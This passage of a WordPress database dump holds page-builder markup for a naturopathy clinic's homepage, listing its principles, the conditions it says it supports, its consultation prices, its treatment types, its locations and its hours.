style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 8.15am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-09-14 10:31:20','2021-09-14 02:31:20','',28,'https://verdenaturopathy.com.au/?p=357',0,'revision','',0),(355,1,'2021-09-07 18:36:41','2021-09-07 10:36:41','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (45 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: 